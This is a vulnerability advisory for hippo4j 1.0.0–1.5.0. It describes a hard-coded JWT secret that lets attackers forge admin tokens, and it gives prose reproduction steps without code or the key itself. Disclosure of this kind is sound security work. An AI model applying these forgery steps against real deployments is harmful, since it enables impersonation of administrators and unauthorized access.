hippo4j Hard-Coded Secret Key in JWT Creation Allows Token Forgery and User Impersonation

A vulnerability exists in hippo4j versions 1.0.0 through 1.5.0, where a hard-coded secret key is used in the creation of JSON Web Tokens (JWTs). This flaw enables attackers with access to the source code or compiled binary to forge valid access tokens, impersonating any user, including those with privileged roles such as 'admin'. The issue poses a critical security risk in environments where JWTs are relied upon for authentication and authorization.

Impact

Exploitation of this vulnerability allows for the forgery of JWTs, enabling unauthorized users to impersonate any user, including administrators.

Reproduction

To reproduce this vulnerability, first obtain a valid access token by sending a POST request with a username and password to the authentication endpoint. Once the token is received, analyze the application's JWT handling code to confirm the presence of a hard-coded secret key. Then, use this secret key to forge a JWT token with an 'admin' user claim. Finally, send a request to the user information endpoint, including the forged token, to verify that the impersonation is successful.